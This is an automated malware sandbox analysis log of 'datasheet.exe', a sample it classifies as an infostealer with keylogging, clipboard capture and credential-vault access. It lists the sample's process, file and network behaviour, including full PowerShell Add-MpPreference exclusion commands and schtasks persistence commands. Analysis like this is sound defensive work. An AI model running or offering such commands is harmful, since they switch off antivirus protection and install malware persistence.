Source: RegSvcs.exe, 00000009.00000002.2218212331.0000000003171000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/t
Source: RegSvcs.exe, 0000000F.00000002.4606620906.000000000316E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616251273.0000000006015000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4615623153.0000000005F72000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614362804.00000000055D0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4604925690.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616102426.0000000005FF5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614478433.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614878043.0000000005653000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000003041000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4615188392.000000000569C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002E98000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616215912.0000000006011000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002E45000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616672764.000000000605B000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616352892.000000000601F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616702168.000000000605E000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616479784.0000000006046000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.globalsign.com/repository/0
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown | HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49716 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.datasheet.exe.3dd06c0.3.raw.unpack, J8Fc3eM3B.cs | .Net Code: _0f2dkte
Source: 0.2.datasheet.exe.3d93ea0.2.raw.unpack, J8Fc3eM3B.cs | .Net Code: _0f2dkte
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window created: window name: CLIPBRDWNDCLASS

                    System Summary

Source: 0.2.datasheet.exe.3d93ea0.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.datasheet.exe.3dd06c0.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.datasheet.exe.3dd06c0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.datasheet.exe.3d93ea0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Users\user\Desktop\datasheet.exe | Code function: 0_2_02B3DF64
Source: C:\Users\user\Desktop\datasheet.exe | Code function: 0_2_0724B650
Source: C:\Users\user\Desktop\datasheet.exe | Code function: 0_2_072416E8
Source: C:\Users\user\Desktop\datasheet.exe | Code function: 0_2_072416F8
Source: C:\Users\user\Desktop\datasheet.exe | Code function: 0_2_0724C360
Source: C:\Users\user\Desktop\datasheet.exe | Code function: 0_2_0724BF28
Source: C:\Users\user\Desktop\datasheet.exe | Code function: 0_2_0724BF17
Source: C:\Users\user\Desktop\datasheet.exe | Code function: 0_2_07249F48
Source: C:\Users\user\Desktop\datasheet.exe | Code function: 0_2_07249B08
Source: C:\Users\user\Desktop\datasheet.exe | Code function: 0_2_07249B10
Source: C:\Users\user\Desktop\datasheet.exe | Code function: 0_2_07C01EC8
Source: C:\Users\user\Desktop\datasheet.exe | Code function: 0_2_07C00040
Source: C:\Users\user\Desktop\datasheet.exe | Code function: 0_2_07C03548
Source: C:\Users\user\Desktop\datasheet.exe | Code function: 0_2_07C00007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_015FAA22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_015F4A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_015F3E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_015F41B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_015FFB48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06AC45A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06AC3550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06ACE260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06AC9278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06AC1000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06ACA1D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06AC5DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06AC56D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06ACC408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06AC5058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06AC3C8B
Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe | Code function: 11_2_02CCDF64
Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe | Code function: 11_2_0750F149
Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe | Code function: 11_2_0750B650
Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe | Code function: 11_2_075016F8
Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe | Code function: 11_2_075016E8
Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe | Code function: 11_2_0750C360
Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe | Code function: 11_2_07509F48
Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe | Code function: 11_2_0750BF17
Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe | Code function: 11_2_0750BF28
Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe | Code function: 11_2_07509B10
Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe | Code function: 11_2_0A8F0F78
Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe | Code function: 11_2_0A8F25E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_012041B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_0120AA28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_01204A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_01203E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_0120FB48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_05875DC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_0587A1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_0587E578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_05879280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_05874598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_05873548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_05873C98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_0587C400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_05875050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_05870338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_058756D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_0120AA22
Source: datasheet.exe, 00000000.00000002.2188466952.0000000003D09000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamef20b0739-611c-4257-8b83-aec156cdf589.exe4 vs datasheet.exe
Source: datasheet.exe, 00000000.00000000.2134073777.0000000000812000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameFfsv.exeB vs datasheet.exe
Source: datasheet.exe, 00000000.00000002.2188466952.0000000003F7F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs datasheet.exe
Source: datasheet.exe, 00000000.00000002.2184663835.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs datasheet.exe
Source: datasheet.exe, 00000000.00000002.2193397242.0000000007C20000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs datasheet.exe
Source: datasheet.exe, 00000000.00000002.2187514566.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs datasheet.exe
Source: datasheet.exe, 00000000.00000002.2191844010.0000000005340000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs datasheet.exe
Source: datasheet.exe, 00000000.00000002.2192454248.000000000716C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs datasheet.exe
Source: datasheet.exe, 00000000.00000002.2192454248.000000000716C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePowerShell.EXEj% vs datasheet.exe
Source: datasheet.exe, 00000000.00000002.2187514566.0000000002D75000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamef20b0739-611c-4257-8b83-aec156cdf589.exe4 vs datasheet.exe
Source: datasheet.exe | Binary or memory string: OriginalFilenameFfsv.exeB vs datasheet.exe
Source: datasheet.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.datasheet.exe.3d93ea0.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.datasheet.exe.3dd06c0.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.datasheet.exe.3dd06c0.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.datasheet.exe.3d93ea0.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: datasheet.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: EhzaIxEFbjyd.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.datasheet.exe.3dd06c0.3.raw.unpack, Dn9SD.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.datasheet.exe.3dd06c0.3.raw.unpack, Dn9SD.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.datasheet.exe.3dd06c0.3.raw.unpack, VM8ZCyu.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.datasheet.exe.3dd06c0.3.raw.unpack, VM8ZCyu.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.datasheet.exe.3dd06c0.3.raw.unpack, VM8ZCyu.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.datasheet.exe.3dd06c0.3.raw.unpack, VM8ZCyu.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.datasheet.exe.3dd06c0.3.raw.unpack, xJtxdMb61s.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.datasheet.exe.3dd06c0.3.raw.unpack, xJtxdMb61s.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, FNHBTlJ5ZnEVw5Eygp.cs | Security API names: _0020.SetAccessControl
Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, FNHBTlJ5ZnEVw5Eygp.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, FNHBTlJ5ZnEVw5Eygp.cs | Security API names: _0020.AddAccessRule
Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, lv8H2d9G3Iqa4sEWPO.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, FNHBTlJ5ZnEVw5Eygp.cs | Security API names: _0020.SetAccessControl
Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, FNHBTlJ5ZnEVw5Eygp.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, FNHBTlJ5ZnEVw5Eygp.cs | Security API names: _0020.AddAccessRule
Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, lv8H2d9G3Iqa4sEWPO.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@21/15@2/2
Source: C:\Users\user\Desktop\datasheet.exe | File created: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7336:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4996:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_03
Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe | Mutant created: \Sessions\1\BaseNamedObjects\DlJnUntfTuDQ
Source: C:\Users\user\Desktop\datasheet.exe | File created: C:\Users\user\AppData\Local\Temp\tmp8D3A.tmp
Source: datasheet.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: datasheet.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\datasheet.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\datasheet.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: datasheet.exe | ReversingLabs: Detection: 55%
Source: C:\Users\user\Desktop\datasheet.exe | File read: C:\Users\user\Desktop\datasheet.exe
Source: unknown | Process created: C:\Users\user\Desktop\datasheet.exe "C:\Users\user\Desktop\datasheet.exe"
Source: C:\Users\user\Desktop\datasheet.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\datasheet.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\datasheet.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\datasheet.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmp8D3A.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\datasheet.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\datasheet.exe | Process created: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe
Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmpA381.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\datasheet.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\datasheet.exe"
Source: C:\Users\user\Desktop\datasheet.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe"
Source: C:\Users\user\Desktop\datasheet.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmp8D3A.tmp"
Source: C:\Users\user\Desktop\datasheet.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmpA381.tmp"
Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\datasheet.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
